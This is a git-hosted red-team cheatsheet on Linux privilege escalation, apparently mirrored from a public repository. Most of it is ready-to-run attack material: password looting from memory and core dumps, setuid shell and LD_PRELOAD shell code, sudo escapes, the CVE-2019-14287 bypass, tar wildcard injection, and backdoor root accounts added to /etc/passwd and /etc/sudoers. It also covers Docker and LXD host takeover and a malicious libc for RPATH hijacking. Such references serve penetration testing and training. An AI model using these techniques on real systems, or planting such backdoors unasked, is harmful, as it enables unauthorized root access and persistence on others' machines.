daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

linux-privilege-escalation.md (31518B)


      1 ---
      2 title: "Linux - Privilege Escalation"
      3 section: "Red Team"
      4 sectionSlug: "redteam"
      5 sourcePath: "docs/redteam/escalation/linux-privilege-escalation.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/escalation/linux-privilege-escalation.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Linux - Privilege Escalation
     12 
     13 ## Summary
     14 
     15 * [Tools](#tools)
     16 * [Checklist](#checklists)
     17 * [Looting for passwords](#looting-for-passwords)
     18     * [Files containing passwords](#files-containing-passwords)
     19     * [Old passwords in /etc/security/opasswd](#old-passwords-in-etcsecurityopasswd)
     20     * [Last edited files](#last-edited-files)
     21     * [In memory passwords](#in-memory-passwords)
     22     * [Find sensitive files](#find-sensitive-files)
     23 * [SSH Key](#ssh-key)
     24     * [Sensitive files](#sensitive-files)
     25     * [SSH Key Predictable PRNG (Authorized_Keys) Process](#ssh-key-predictable-prng-authorized_keys-process)
     26 * [Scheduled tasks](#scheduled-tasks)
     27     * [Cron jobs](#cron-jobs)
     28     * [Systemd timers](#systemd-timers)
     29 * [SUID](#suid)
     30     * [Find SUID binaries](#find-suid-binaries)
     31     * [Create a SUID binary](#create-a-suid-binary)
     32 * [Capabilities](#capabilities)
     33     * [List capabilities of binaries](#list-capabilities-of-binaries)
     34     * [Edit capabilities](#edit-capabilities)
     35     * [Interesting capabilities](#interesting-capabilities)
     36 * [SUDO](#sudo)
     37     * [NOPASSWD](#nopasswd)
     38     * [LD_PRELOAD and NOPASSWD](#ld_preload-and-nopasswd)
     39     * [Doas](#doas)
     40     * [sudo_inject](#sudo_inject)
     41     * [CVE-2019-14287](#cve-2019-14287)
     42 * [GTFOBins](#gtfobins)
     43 * [Wildcard](#wildcard)
     44 * [Writable files](#writable-files)
     45     * [Writable /etc/passwd](#writable-etcpasswd)
     46     * [Writable /etc/sudoers](#writable-etcsudoers)
     47 * [NFS Root Squashing](#nfs-root-squashing)
     48 * [Shared Library](#shared-library)
     49     * [ldconfig](#ldconfig)
     50     * [RPATH](#rpath)
     51 * [Groups](#groups)
     52     * [Docker](#docker)
     53     * [LXC/LXD](#lxclxd)
     54 * [Hijack TMUX session](#hijack-tmux-session)
     55 * [Kernel Exploits](#kernel-exploits)
     56     * [CVE-2022-0847 (DirtyPipe)](#cve-2022-0847-dirtypipe)
     57     * [CVE-2016-5195 (DirtyCow)](#cve-2016-5195-dirtycow)
     58     * [CVE-2010-3904 (RDS)](#cve-2010-3904-rds)
     59     * [CVE-2010-4258 (Full Nelson)](#cve-2010-4258-full-nelson)
     60     * [CVE-2012-0056 (Mempodipper)](#cve-2012-0056-mempodipper)
     61 
     62 ## Tools
     63 
     64 There are many scripts that you can execute on a linux machine which automatically enumerate sytem information, processes, and files to locate privilege escalation vectors.
     65 Here are a few:
     66 
     67 * [LinPEAS - Linux Privilege Escalation Awesome Script](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
     68 
     69     ```powershell
     70     wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh
     71     curl "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -o linpeas.sh
     72     ./linpeas.sh -a #all checks - deeper system enumeration, but it takes longer to complete.
     73     ./linpeas.sh -s #superfast & stealth - This will bypass some time consuming checks. In stealth mode Nothing will be written to the disk.
     74     ./linpeas.sh -P #Password - Pass a password that will be used with sudo -l and bruteforcing other users
     75     ```
     76 
     77 * [LinuxSmartEnumeration - Linux enumeration tools for pentesting and CTFs](https://github.com/diego-treitos/linux-smart-enumeration)
     78 
     79     ```powershell
     80     wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh
     81     curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh
     82     ./lse.sh -l1 # shows interesting information that should help you to privesc
     83     ./lse.sh -l2 # dump all the information it gathers about the system
     84     ```
     85 
     86 * [LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks](https://github.com/rebootuser/LinEnum)
     87 
     88     ```powershell
     89     ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
     90     ```
     91 
     92 * [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
     93 * [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker)
     94 * [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
     95 * [Privilege Escalation through sudo - Linux](https://github.com/TH3xACE/SUDO_KILLER)
     96 
     97 ## Checklists
     98 
     99 * Kernel and distribution release details
    100 * System Information:
    101     * Hostname
    102     * Networking details:
    103     * Current IP
    104     * Default route details
    105     * DNS server information
    106 * User Information:
    107     * Current user details
    108     * Last logged on users
    109     * Shows users logged onto the host
    110     * List all users including uid/gid information
    111     * List root accounts
    112     * Extracts password policies and hash storage method information
    113     * Checks umask value
    114     * Checks if password hashes are stored in /etc/passwd
    115     * Extract full details for 'default' uid's such as 0, 1000, 1001 etc
    116     * Attempt to read restricted files i.e. /etc/shadow
    117     * List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.)
    118     * Basic SSH checks
    119 * Privileged access:
    120     * Which users have recently used sudo
    121     * Determine if /etc/sudoers is accessible
    122     * Determine if the current user has Sudo access without a password
    123     * Are known 'good' breakout binaries available via Sudo (i.e. nmap, vim etc.)
    124     * Is root's home directory accessible
    125     * List permissions for /home/
    126 * Environmental:
    127     * Display current $PATH
    128     * Displays env information
    129 * Jobs/Tasks:
    130     * List all cron jobs
    131     * Locate all world-writable cron jobs
    132     * Locate cron jobs owned by other users of the system
    133     * List the active and inactive systemd timers
    134 * Services:
    135     * List network connections (TCP & UDP)
    136     * List running processes
    137     * Lookup and list process binaries and associated permissions
    138     * List inetd.conf/xined.conf contents and associated binary file permissions
    139     * List init.d binary permissions
    140 * Version Information (of the following):
    141     * Sudo
    142     * MYSQL
    143     * Postgres
    144     * Apache
    145         * Checks user config
    146         * Shows enabled modules
    147         * Checks for htpasswd files
    148         * View www directories
    149 * Default/Weak Credentials:
    150     * Checks for default/weak Postgres accounts
    151     * Checks for default/weak MYSQL accounts
    152 * Searches:
    153     * Locate all SUID/GUID files
    154     * Locate all world-writable SUID/GUID files
    155     * Locate all SUID/GUID files owned by root
    156     * Locate 'interesting' SUID/GUID files (i.e. nmap, vim etc)
    157     * Locate files with POSIX capabilities
    158     * List all world-writable files
    159     * Find/list all accessible *.plan files and display contents
    160     * Find/list all accessible *.rhosts files and display contents
    161     * Show NFS server details
    162     * Locate *.conf and*.log files containing keyword supplied at script runtime
    163     * List all *.conf files located in /etc
    164     * Locate mail
    165 * Platform/software specific tests:
    166     * Checks to determine if we're in a Docker container
    167     * Checks to see if the host has Docker installed
    168     * Checks to determine if we're in an LXC container
    169 
    170 ## Looting for passwords
    171 
    172 ### Files containing passwords
    173 
    174 ```powershell
    175 grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
    176 find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
    177 ```
    178 
    179 ### Old passwords in /etc/security/opasswd
    180 
    181 The `/etc/security/opasswd` file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them.
    182 
    183 :warning: Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes
    184 
    185 ### Last edited files
    186 
    187 Files that were edited in the last 10 minutes
    188 
    189 ```powershell
    190 find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
    191 ```
    192 
    193 ### In memory passwords
    194 
    195 **Memory**:
    196 
    197 ```powershell
    198 strings /dev/mem -n10 | grep -i PASS
    199 ```
    200 
    201 **Core Dump**:
    202 
    203 ```ps1
    204 # Find PID
    205 ps -eo pid,command
    206 
    207 # Core dump PID
    208 gcore <pid> -o dumpfile
    209 
    210 # Search for passwords
    211 strings -n 5 dumpfile | grep -i pass
    212 ```
    213 
    214 ### Find sensitive files
    215 
    216 ```powershell
    217 $ locate password | more           
    218 /boot/grub/i386-pc/password.mod
    219 /etc/pam.d/common-password
    220 /etc/pam.d/gdm-password
    221 /etc/pam.d/gdm-password.original
    222 /lib/live/config/0031-root-password
    223 ...
    224 ```
    225 
    226 ### Preseed
    227 
    228 A preseed.cfg file is used in Debian-based Linux distributions to automate the installation process. It contains answers to the questions that the installer normally asks, allowing for a fully unattended installation. This file can specify configurations such as partitioning schemes, package selections, network settings, and user accounts.
    229 
    230 * Root password in clear text
    231 
    232   ```ps1
    233   d-i passwd/root-password password root_password_123
    234   d-i passwd/root-password-again password root_password_123
    235   ```
    236 
    237 * Root password encrypted using an MD5 hash
    238 
    239   ```ps1
    240   d-i passwd/root-password-crypted password $1$DhSfFtNS$v/Eb.KsQkTq8nKIX1.B8n.
    241   ```
    242 
    243 * Normal user's password in clear text
    244 
    245   ```ps1
    246   d-i passwd/user-password password my_password_123
    247   d-i passwd/user-password-again password my_password_123
    248   ```
    249 
    250 * Normal user's password encrypted using an MD5 hash
    251 
    252   ```ps1
    253   d-i passwd/user-password-crypted password $1$DgJMNO1/$BqfY2C5y00p0yhpApPmmJ1
    254   ```
    255 
    256 ## SSH Key
    257 
    258 ### Sensitive files
    259 
    260 ```ps1
    261 find / -name authorized_keys 2> /dev/null
    262 find / -name id_rsa 2> /dev/null
    263 ```
    264 
    265 ### SSH Key Predictable PRNG (Authorized_Keys) Process
    266 
    267 This module describes how to attempt to use an obtained authorized_keys file on a host system.
    268 
    269 Needed : SSH-DSS String from authorized_keys file
    270 
    271 **Steps**
    272 
    273 Get the authorized_keys file. An example of this file would look like so:
    274 
    275 ```ps1
    276 ssh-dss AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ... 
    277 ```
    278 
    279 Since this is an ssh-dss key, we need to add that to our local copy of `/etc/ssh/ssh_config` and `/etc/ssh/sshd_config`:
    280 
    281 ```ps1
    282 echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config
    283 echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshd_config
    284 /etc/init.d/ssh restart
    285 ```
    286 
    287 Get [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) and unpack the keys:
    288 
    289 ```ps1
    290 git clone https://github.com/g0tmi1k/debian-ssh
    291 cd debian-ssh
    292 tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz2
    293 ```
    294 
    295 Grab the first 20 or 30 bytes from the key file shown above starting with the `"AAAA..."` portion and grep the unpacked keys with it as:
    296 
    297 ```ps1
    298 grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf'
    299 dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub
    300 ```
    301 
    302 IF SUCCESSFUL, this will return a file (68b329da9893e34099c7d8ad5cb9c940-17934.pub) public file. To use the private key file to connect, drop the '.pub' extension and do:
    303 
    304 ```ps1
    305 ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934
    306 ```
    307 
    308 And you should connect without requiring a password. If stuck, the `-vvv` verbosity should provide enough details as to why.
    309 
    310 ## Scheduled tasks
    311 
    312 ### Cron jobs
    313 
    314 Check if you have access with write permission on these files.
    315 Check inside the file, to find other paths with write permissions.
    316 
    317 ```powershell
    318 /etc/init.d
    319 /etc/cron*
    320 /etc/crontab
    321 /etc/cron.allow
    322 /etc/cron.d 
    323 /etc/cron.deny
    324 /etc/cron.daily
    325 /etc/cron.hourly
    326 /etc/cron.monthly
    327 /etc/cron.weekly
    328 /etc/sudoers
    329 /etc/exports
    330 /etc/anacrontab
    331 /var/spool/cron
    332 /var/spool/cron/crontabs/root
    333 
    334 crontab -l
    335 ls -alh /var/spool/cron;
    336 ls -al /etc/ | grep cron
    337 ls -al /etc/cron*
    338 cat /etc/cron*
    339 cat /etc/at.allow
    340 cat /etc/at.deny
    341 cat /etc/cron.allow
    342 cat /etc/cron.deny*
    343 ```
    344 
    345 You can use [DominicBreuker/pspy](https://github.com/DominicBreuker/pspy) to detect a CRON job.
    346 
    347 ```powershell
    348 # print both commands and file system events and scan procfs every 1000 ms (=1sec)
    349 ./pspy64 -pf -i 1000 
    350 ```
    351 
    352 ## Systemd timers
    353 
    354 ```powershell
    355 systemctl list-timers --all
    356 NEXT                          LEFT     LAST                          PASSED             UNIT                         ACTIVATES
    357 Mon 2019-04-01 02:59:14 CEST  15h left Sun 2019-03-31 10:52:49 CEST  24min ago          apt-daily.timer              apt-daily.service
    358 Mon 2019-04-01 06:20:40 CEST  19h left Sun 2019-03-31 10:52:49 CEST  24min ago          apt-daily-upgrade.timer      apt-daily-upgrade.service
    359 Mon 2019-04-01 07:36:10 CEST  20h left Sat 2019-03-09 14:28:25 CET   3 weeks 0 days ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
    360 
    361 3 timers listed.
    362 ```
    363 
    364 ## SUID
    365 
    366 SUID/Setuid stands for "set user ID upon execution", it is enabled by default in every Linux distributions. If a file with this bit is run, the uid will be changed by the owner one. If the file owner is `root`, the uid will be changed to `root` even if it was executed from user `bob`. SUID bit is represented by an `s`.
    367 
    368 ```powershell
    369 ╭─swissky@lab ~  
    370 ╰─$ ls /usr/bin/sudo -alh                  
    371 -rwsr-xr-x 1 root root 138K 23 nov.  16:04 /usr/bin/sudo
    372 ```
    373 
    374 ### Find SUID binaries
    375 
    376 ```bash
    377 find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
    378 find / -uid 0 -perm -4000 -type f 2>/dev/null
    379 ```
    380 
    381 ### Create a SUID binary
    382 
    383 | Function   | Description                                             |
    384 | ---------- | ------------------------------------------------------- |
    385 | setreuid() | sets real and effective user IDs of the calling process |
    386 | setuid()   | sets the effective user ID of the calling process       |
    387 | setgid()   | sets the effective group ID of the calling process      |
    388 
    389 ```bash
    390 print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c   
    391 gcc -o /tmp/suid /tmp/suid.c  
    392 sudo chmod +x /tmp/suid # execute right
    393 sudo chmod +s /tmp/suid # setuid bit
    394 ```
    395 
    396 ## Capabilities
    397 
    398 ### List capabilities of binaries
    399 
    400 ```powershell
    401 ╭─swissky@lab ~  
    402 ╰─$ /usr/bin/getcap -r  /usr/bin
    403 /usr/bin/fping                = cap_net_raw+ep
    404 /usr/bin/dumpcap              = cap_dac_override,cap_net_admin,cap_net_raw+eip
    405 /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
    406 /usr/bin/rlogin               = cap_net_bind_service+ep
    407 /usr/bin/ping                 = cap_net_raw+ep
    408 /usr/bin/rsh                  = cap_net_bind_service+ep
    409 /usr/bin/rcp                  = cap_net_bind_service+ep
    410 ```
    411 
    412 ### Edit capabilities
    413 
    414 ```powershell
    415 /usr/bin/setcap -r /bin/ping            # remove
    416 /usr/bin/setcap cap_net_raw+p /bin/ping # add
    417 ```
    418 
    419 ### Interesting capabilities
    420 
    421 Having the capability =ep means the binary has all the capabilities.
    422 
    423 ```powershell
    424 $ getcap openssl /usr/bin/openssl 
    425 openssl=ep
    426 ```
    427 
    428 Alternatively the following capabilities can be used in order to upgrade your current privileges.
    429 
    430 ```powershell
    431 cap_dac_read_search # read anything
    432 cap_setuid+ep # setuid
    433 ```
    434 
    435 Example of privilege escalation with `cap_setuid+ep`
    436 
    437 ```powershell
    438 $ sudo /usr/bin/setcap cap_setuid+ep /usr/bin/python2.7
    439 
    440 $ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
    441 sh-5.0# id
    442 uid=0(root) gid=1000(swissky)
    443 ```
    444 
    445 | Capabilities name    | Description                                                                                                                                 |
    446 | -------------------- | ------------------------------------------------------------------------------------------------------------------------------------------- |
    447 | CAP_AUDIT_CONTROL    | Allow to enable/disable kernel auditing                                                                                                     |
    448 | CAP_AUDIT_WRITE      | Helps to write records to kernel auditing log                                                                                               |
    449 | CAP_BLOCK_SUSPEND    | This feature can block system suspends                                                                                                      |
    450 | CAP_CHOWN            | Allow user to make arbitrary change to files UIDs and GIDs                                                                                  |
    451 | CAP_DAC_OVERRIDE     | This helps to bypass file read, write and execute permission checks                                                                         |
    452 | CAP_DAC_READ_SEARCH  | This only bypasses file and directory read/execute permission checks                                                                        |
    453 | CAP_FOWNER           | This enables bypass of permission checks on operations that normally require the filesystem UID of the process to match the UID of the file |
    454 | CAP_KILL             | Allow the sending of signals to processes belonging to others                                                                               |
    455 | CAP_SETGID           | Allow changing of the GID                                                                                                                   |
    456 | CAP_SETUID           | Allow changing of the UID                                                                                                                   |
    457 | CAP_SETPCAP          | Helps to transferring and removal of current set to any PID                                                                                 |
    458 | CAP_IPC_LOCK         | This helps to lock memory                                                                                                                   |
    459 | CAP_MAC_ADMIN        | Allow MAC configuration or state changes                                                                                                    |
    460 | CAP_NET_RAW          | Use RAW and PACKET sockets                                                                                                                  |
    461 | CAP_NET_BIND_SERVICE | SERVICE Bind a socket to internet domain privileged ports                                                                                   |
    462 
    463 ## SUDO
    464 
    465 Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER)
    466 
    467 ### NOPASSWD
    468 
    469 Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password.
    470 
    471 ```bash
    472 $ sudo -l
    473 
    474 User demo may run the following commands on crashlab:
    475     (root) NOPASSWD: /usr/bin/vim
    476 ```
    477 
    478 In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`.
    479 
    480 ```bash
    481 sudo vim -c '!sh'
    482 sudo -u root vim -c '!sh'
    483 ```
    484 
    485 ### LD_PRELOAD and NOPASSWD
    486 
    487 If `LD_PRELOAD` is explicitly defined in the sudoers file
    488 
    489 ```powershell
    490 Defaults        env_keep += LD_PRELOAD
    491 ```
    492 
    493 Compile the following shared object using the C code below with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles`
    494 
    495 ```c
    496 #include <stdio.h>
    497 #include <sys/types.h>
    498 #include <stdlib.h>
    499 #include <unistd.h>
    500 void _init() {
    501  unsetenv("LD_PRELOAD");
    502  setgid(0);
    503  setuid(0);
    504  system("/bin/sh");
    505 }
    506 ```
    507 
    508 Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD=<full_path_to_so_file> <program>`, e.g: `sudo LD_PRELOAD=/tmp/shell.so find`
    509 
    510 ### Doas
    511 
    512 There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf`
    513 
    514 ```bash
    515 permit nopass demo as root cmd vim
    516 ```
    517 
    518 ### sudo_inject
    519 
    520 Using [https://github.com/nongiach/sudo_inject](https://github.com/nongiach/sudo_inject)
    521 
    522 ```powershell
    523 $ sudo whatever
    524 [sudo] password for user:    
    525 # Press <ctrl>+c since you don't have the password. 
    526 # This creates an invalid sudo tokens.
    527 $ sh exploit.sh
    528 .... wait 1 seconds
    529 $ sudo -i # no password required :)
    530 # id
    531 uid=0(root) gid=0(root) groups=0(root)
    532 ```
    533 
    534 Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf)
    535 
    536 ### CVE-2019-14287
    537 
    538 ```powershell
    539 # Exploitable when a user have the following permissions (sudo -l)
    540 (ALL, !root) ALL
    541 
    542 # If you have a full TTY, you can exploit it like this
    543 sudo -u#-1 /bin/bash
    544 sudo -u#4294967295 id
    545 ```
    546 
    547 ## GTFOBins
    548 
    549 [GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
    550 
    551 The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
    552 
    553 > gdb -nx -ex '!sh' -ex quit
    554 > sudo mysql -e '\! /bin/sh'
    555 > strace -o /dev/null /bin/sh
    556 > sudo awk 'BEGIN {system("/bin/sh")}'
    557 
    558 ## Wildcard
    559 
    560 By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that's where the wildcard comes in handy.
    561 
    562 ```powershell
    563 # create file for exploitation
    564 touch -- "--checkpoint=1"
    565 touch -- "--checkpoint-action=exec=sh shell.sh"
    566 echo "#\!/bin/bash\ncat /etc/passwd > /tmp/flag\nchmod 777 /tmp/flag" > shell.sh
    567 
    568 # vulnerable script
    569 tar cf archive.tar *
    570 ```
    571 
    572 Tool: [wildpwn](https://github.com/localh0t/wildpwn)
    573 
    574 ## Writable files
    575 
    576 List world writable files on the system.
    577 
    578 ```powershell
    579 find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
    580 find / -perm -2 -type f 2>/dev/null
    581 find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
    582 ```
    583 
    584 ### Writable /etc/sysconfig/network-scripts/ (Centos/Redhat)
    585 
    586 /etc/sysconfig/network-scripts/ifcfg-1337 for example
    587 
    588 ```powershell
    589 NAME=Network /bin/id  &lt;= Note the blank space
    590 ONBOOT=yes
    591 DEVICE=eth0
    592 
    593 EXEC :
    594 ./etc/sysconfig/network-scripts/ifcfg-1337
    595 ```
    596 
    597 src : [https://vulmon.com/exploitdetailsqidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)
    598 
    599 ### Writable /etc/passwd
    600 
    601 First generate a password with one of the following commands.
    602 
    603 ```powershell
    604 openssl passwd -1 -salt hacker hacker
    605 mkpasswd -m SHA-512 hacker
    606 python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
    607 ```
    608 
    609 Then add the user `hacker` and add the generated password.
    610 
    611 ```powershell
    612 hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash
    613 ```
    614 
    615 E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash`
    616 
    617 You can now use the `su` command with `hacker:hacker`
    618 
    619 Alternatively you can use the following lines to add a dummy user without a password.
    620 WARNING: you might degrade the current security of the machine.
    621 
    622 ```powershell
    623 echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
    624 su - dummy
    625 ```
    626 
    627 NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`.
    628 
    629 ### Writable /etc/sudoers
    630 
    631 ```powershell
    632 echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
    633 
    634 # use SUDO without password
    635 echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
    636 echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers
    637 ```
    638 
    639 ## NFS Root Squashing
    640 
    641 When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it.
    642 
    643 ```powershell
    644 # remote check the name of the folder
    645 showmount -e 10.10.10.10
    646 
    647 # create dir
    648 mkdir /tmp/nfsdir  
    649 
    650 # mount directory 
    651 mount -t nfs 10.10.10.10:/shared /tmp/nfsdir    
    652 cd /tmp/nfsdir
    653 
    654 # copy wanted shell 
    655 cp /bin/bash .  
    656 
    657 # set suid permission
    658 chmod +s bash  
    659 ```
    660 
    661 ## Shared Library
    662 
    663 ### ldconfig
    664 
    665 Identify shared libraries with `ldd`
    666 
    667 ```powershell
    668 $ ldd /opt/binary
    669     linux-vdso.so.1 (0x00007ffe961cd000)
    670     vulnlib.so.8 => /usr/lib/vulnlib.so.8 (0x00007fa55e55a000)
    671     /lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa55e6c8000)        
    672 ```
    673 
    674 Create a library in `/tmp` and activate the path.
    675 
    676 ```powershell
    677 gcc –Wall –fPIC –shared –o vulnlib.so /tmp/vulnlib.c
    678 echo "/tmp/" > /etc/ld.so.conf.d/exploit.conf && ldconfig -l /tmp/vulnlib.so
    679 /opt/binary
    680 ```
    681 
    682 ### RPATH
    683 
    684 ```powershell
    685 level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH"
    686  0x00000001 (NEEDED)                     Shared library: [libc.so.6]
    687  0x0000000f (RPATH)                      Library rpath: [/var/tmp/flag15]
    688 
    689 level15@nebula:/home/flag15$ ldd ./flag15 
    690  linux-gate.so.1 =>  (0x0068c000)
    691  libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000)
    692  /lib/ld-linux.so.2 (0x005bb000)
    693 ```
    694 
    695 By copying the lib into `/var/tmp/flag15/` it will be used by the program in this place as specified in the `RPATH` variable.
    696 
    697 ```powershell
    698 level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/
    699 
    700 level15@nebula:/home/flag15$ ldd ./flag15 
    701  linux-gate.so.1 =>  (0x005b0000)
    702  libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)
    703  /lib/ld-linux.so.2 (0x00737000)
    704 ```
    705 
    706 Then create an evil library in `/var/tmp` with `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6`
    707 
    708 ```powershell
    709 #include<stdlib.h>
    710 #define SHELL "/bin/sh"
    711 
    712 int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end))
    713 {
    714  char *file = SHELL;
    715  char *argv[] = {SHELL,0};
    716  setresuid(geteuid(),geteuid(), geteuid());
    717  execve(file,argv,0);
    718 }
    719 ```
    720 
    721 ## Groups
    722 
    723 ### Docker
    724 
    725 Mount the filesystem in a bash container, allowing you to edit the `/etc/passwd` as root, then add a backdoor account `toor:password`.
    726 
    727 ```bash
    728 $> docker run -it --rm -v $PWD:/mnt bash
    729 $> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
    730 ```
    731 
    732 Almost similar but you will also see all processes running on the host and be connected to the same NICs.
    733 
    734 ```powershell
    735 docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash
    736 ```
    737 
    738 Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell
    739 
    740 ```powershell
    741 $ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
    742 latest: Pulling from chrisfosterelli/rootplease
    743 2de59b831a23: Pull complete 
    744 354c3661655e: Pull complete 
    745 91930878a2d7: Pull complete 
    746 a3ed95caeb02: Pull complete 
    747 489b110c54dc: Pull complete 
    748 Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0
    749 Status: Downloaded newer image for chrisfosterelli/rootplease:latest
    750 
    751 You should now have a root shell on the host OS
    752 Press Ctrl-D to exit the docker instance / shell
    753 
    754 sh-5.0# id
    755 uid=0(root) gid=0(root) groups=0(root)
    756 ```
    757 
    758 More docker privilege escalation using the Docker Socket.
    759 
    760 ```powershell
    761 sudo docker -H unix:///google/host/var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
    762 sudo docker -H unix:///google/host/var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
    763 ```
    764 
    765 ### LXC/LXD
    766 
    767 The privesc requires to run a container with elevated privileges and mount the host filesystem inside.
    768 
    769 ```powershell
    770 ╭─swissky@lab ~  
    771 ╰─$ id
    772 uid=1000(swissky) gid=1000(swissky) groupes=1000(swissky),3(sys),90(network),98(power),110(lxd),991(lp),998(wheel)
    773 ```
    774 
    775 Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem.
    776 
    777 ```powershell
    778 # build a simple alpine image
    779 git clone https://github.com/saghul/lxd-alpine-builder
    780 ./build-alpine -a i686
    781 
    782 # import the image
    783 lxc image import ./alpine.tar.gz --alias myimage
    784 
    785 # run the image
    786 lxc init myimage mycontainer -c security.privileged=true
    787 
    788 # mount the /root into the image
    789 lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
    790 
    791 # interact with the container
    792 lxc start mycontainer
    793 lxc exec mycontainer /bin/sh
    794 ```
    795 
    796 Alternatively <https://github.com/initstring/lxd_root>
    797 
    798 ## Hijack TMUX session
    799 
    800 Require a read access to the tmux socket : `/tmp/tmux-1000/default`.
    801 
    802 ```powershell
    803 export TMUX=/tmp/tmux-1000/default,1234,0 
    804 tmux ls
    805 ```
    806 
    807 ## Kernel Exploits
    808 
    809 Precompiled exploits can be found inside these repositories, run them at your own risk !
    810 
    811 * [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits)
    812 * [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/)
    813 
    814 The following exploits are known to work well, search for more exploits with `searchsploit -w linux kernel centos`.
    815 
    816 Another way to find a kernel exploit is to get the specific kernel version and linux distro of the machine by doing `uname -a`
    817 Copy the kernel version and distribution, and search for it in google or in <https://www.exploit-db.com/>.
